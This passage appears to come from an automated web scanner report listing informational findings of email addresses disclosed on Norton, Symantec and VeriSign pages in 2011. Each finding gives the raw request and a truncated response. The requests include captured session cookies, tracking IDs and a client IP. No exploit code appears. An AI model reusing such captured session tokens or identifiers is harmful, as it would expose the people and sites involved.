HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:37 GMT Content-Length: 30123 Last-Modified: Wed, 28 Apr 2010 02:37:02 GMT Accept-Ranges: bytes /* SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ /* Rainmaker changes to set the report suite. */ if (location.href.inde...[SNIP]... =s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;" +"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc ^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t" +";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id...[SNIP]...
17.44. http://us.norton.com/beta/overview.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/beta/overview.jsp
Issue detail
The following email address was disclosed in the response:betafeedback@symantec.com
Request
GET /beta/overview.jsp?pvid=n3605beta&inid=us_hho_homepage_hero4_n360v5beta HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Expires: Fri, 09 Sep 2011 21:47:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:47:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39170 <meta http-equiv="refresh" content="0;url=http://us.norton.com/beta"> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Norton Beta Software - Norton 360 Version...[SNIP]... <a href="mailto:betafeedback@symantec.com ">betafeedback@symantec.com </a>...[SNIP]...
17.45. http://us.norton.com/familyresources/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/familyresources/index.jsp
Issue detail
The following email addresses were disclosed in the response:advertising@norton.com marian@norton.com
Request
GET /familyresources/index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=64 Date: Fri, 09 Sep 2011 21:47:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67586 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Family Resource Center: Internet Safety for Children, Teens &amp; Adults...[SNIP]... <a href="mailto:marian@norton.com ">...[SNIP]... <a href="mailto:advertising@norton.com ">...[SNIP]...
17.46. http://us.norton.com/scripts/colorbox/norton/jquery.colorbox-min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/scripts/colorbox/norton/jquery.colorbox-min.js
Issue detail
The following email address was disclosed in the response:
Request
GET /scripts/colorbox/norton/jquery.colorbox-min.js HTTP/1.1 Host: us.norton.com Proxy-Connection: keep-alive Referer: http://us.norton.com/index.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AKNORTDC=0
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Wed, 09 Feb 2011 19:22:17 GMT ETag: "23e8-4d52e969" Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 9192 Cache-Control: public, max-age=2112 Date: Fri, 09 Sep 2011 21:30:57 GMT Connection: close // ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+ // Copyright (c) 2010 Jack Moore - jack@colorpowered.com // Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php (function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";functi...[SNIP]...
17.47. https://vipmanager.verisign.com/vipmgr/createtrialaccount.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://vipmanager.verisign.com
Path:
/vipmgr/createtrialaccount.v
Issue detail
The following email address was disclosed in the response:viptrial-support@verisign.com
Request
GET /vipmgr/createtrialaccount.v HTTP/1.1 Host: vipmanager.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:47:32 GMT Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <head> <META http-equiv="Content-Type" content="te...[SNIP]... <a href="mailto:viptrial-support@verisign.com ">viptrial-support@verisign.com </a>...[SNIP]...
17.48. http://vipmobile.verisign.com/home.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://vipmobile.verisign.com
Path:
/home.v
Issue detail
The following email address was disclosed in the response:
Request
GET /home.v HTTP/1.1 Host: vipmobile.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:50 GMT Server: Apache Content-Type: text/html;charset=utf-8 Content-Length: 16260 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vipmobile@verisign.com ">...[SNIP]...
17.49. https://vipmobile.verisign.com/home.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://vipmobile.verisign.com
Path:
/home.v
Issue detail
The following email address was disclosed in the response:
Request
GET /home.v HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://idprotect.verisign.com/orderstart.v Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:52:06 GMT Server: Apache Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 16260 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vipmobile@verisign.com ">...[SNIP]...
17.50. https://vipmobile.verisign.com/supportedphones.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://vipmobile.verisign.com
Path:
/supportedphones.v
Issue detail
The following email address was disclosed in the response:
Request
GET /supportedphones.v HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:46 GMT Server: Apache Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 1508897 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vipmobile@verisign.com ">...[SNIP]... <a href="mailto:vipmobile@verisign.com " style="white-space:nowrap;">vipmobile@verisign.com </a>...[SNIP]...
17.51. https://www-secure.symantec.com/about/profile/policies/privacy.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/about/profile/policies/privacy.jsp
Issue detail
The following email address was disclosed in the response:
Request
GET /about/profile/policies/privacy.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1721 Date: Fri, 09 Sep 2011 21:47:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 82442 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Complete Privacy Policy - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"...[SNIP]... <a href="mailto:privacy@symantec.com ">privacy@symantec.com </a>...[SNIP]... <a href="mailto:privacy@symantec.com ">privacy@symantec.com </a>...[SNIP]...
17.52. http://www.symantec.com/business/theme.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/business/theme.jsp
Issue detail
The following email addresses were disclosed in the response:billing@verisign.com channel-partners@verisign.com eca-authentication@verisign.com eca-sales@verisign.com eca-support@verisign.com renewals-team@verisign.com verisales@verisign.com
Request
GET /business/theme.jsp?themeid=contact-verisign HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/verisign-worldwide/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_nr%3D1315621569527-New%7C1336357569527%3B%20event69%3Devent69%7C1336357569528%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D806960442771%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621570007; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 51820 Cache-Control: public, max-age=1145 Date: Fri, 09 Sep 2011 21:26:48 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>VeriSign Authentication Services, now a part of Symantec - SSL Certificates, Extended Validation SSL, User Authenti...[SNIP]... <a href="mailto:verisales@verisign.com ">verisales@verisign.com </a>...[SNIP]... <a href="mailto:renewals-team@verisign.com ">renewals-team@verisign.com </a>...[SNIP]... <a href="mailto:channel-partners@verisign.com ">channel-partners@verisign.com </a>...[SNIP]... <a href="mailto:eca-support@verisign.com ">eca-support@verisign.com </a>...[SNIP]... <a href="mailto:eca-authentication@verisign.com ">eca-authentication@verisign.com </a>...[SNIP]... <a href="mailto:eca-sales@verisign.com ">eca-sales@verisign.com </a>...[SNIP]... <a href="mailto:billing@verisign.com ">billing@verisign.com </a>...[SNIP]...
17.53. http://www.symantec.com/connect/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/connect/
Issue detail
The following email address was disclosed in the response:Customer_Certifications@Symantec.com
Request
GET /connect/ HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Last-Modified: Fri, 09 Sep 2011 21:03:21 +0000 Vary: Cookie ETag: "1315602201" Content-Type: text/html; charset=utf-8 X-Varnish: 1369354087 1369326710 X-Varnish-Cache: HIT X-Varnish-Hits: 287 Vary: Accept-Encoding Content-Length: 80043 Cache-Control: public, max-age=1794 Date: Fri, 09 Sep 2011 21:34:13 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... Exams for FREE – Register now! The first 100 candidates (customers or partners) to register for an SCS Certification or STS Accreditation exam will be able to take an exam for FREE! Email Customer_Certifications@Symantec.com or Partner... </div>...[SNIP]...
17.54. http://www.symantec.com/searchg/common.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/searchg/common.js
Issue detail
The following email address was disclosed in the response:
Request
GET /searchg/common.js HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Wed, 10 Mar 2010 00:03:20 GMT ETag: "db11-4b96e1c8" Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 56081 Cache-Control: public, max-age=5333 Date: Fri, 09 Sep 2011 21:33:14 GMT Connection: close // copied from google3/java/com/google/caribou/antlers/fin/jsdata //------------------------------------------------------------------------ // This file contains common utilities and basic javascrip...[SNIP]... ss = token.substring(1, (end != -1) ? end : token.length); } else if (address == "") { name += token; } i += token.length; } // Check if it's a simple email address of the form "jlim@google.com " if (address == "" && name.indexOf("@") != -1) { address = name; name = ""; } name = CollapseWhitespace(name); name = StripQuotes(name, "'"); name = StripQuotes(name, "\""); addre...[SNIP]...
17.55. http://www.symantec.com/searchg/uri.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/searchg/uri.js
Issue detail
The following email address was disclosed in the response:
Request
GET /searchg/uri.js HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Last-Modified: Wed, 10 Mar 2010 00:03:20 GMT ETag: "44bc-4b96e1c8" Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 17596 Cache-Control: public, max-age=5296 Date: Fri, 09 Sep 2011 21:33:14 GMT Connection: close // Copyright 2006 Google Inc. // All Rights Reserved. /** * @fileoverview * Implements RFC 3986 for parsing/formatting URIs. * * @author msamuel@google.com */ /** * creates a uri from the string form. The parser is relaxed, so special * characters that aren't escaped but don't cause ambiguities will not cause * parse failures. * * @return {URI|Nu...[SNIP]...
17.56. http://www.verisign.ch/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.57. http://www.verisign.ch/contact-information/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/contact-information/index.html
Issue detail
The following email addresses were disclosed in the response:billing@verisign.ch channel-partners@verisign.com enterprise-sales@verisign.ch sales@verisign.ch
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 39107 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="/assets/corp/css/corp_generic_st...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]... <a href="mailto:sales@verisign.ch ">sales@verisign.ch </a>...[SNIP]... <a href="mailto:enterprise-sales@verisign.ch ">enterprise-sales@verisign.ch </a>...[SNIP]... <a href="mailto:billing@verisign.ch ">billing@verisign.ch </a>...[SNIP]... <a href="mailto:sales@verisign.ch ">...[SNIP]...
17.58. http://www.verisign.ch/corporate/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/corporate/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.59. http://www.verisign.ch/trust-seal/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/trust-seal/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
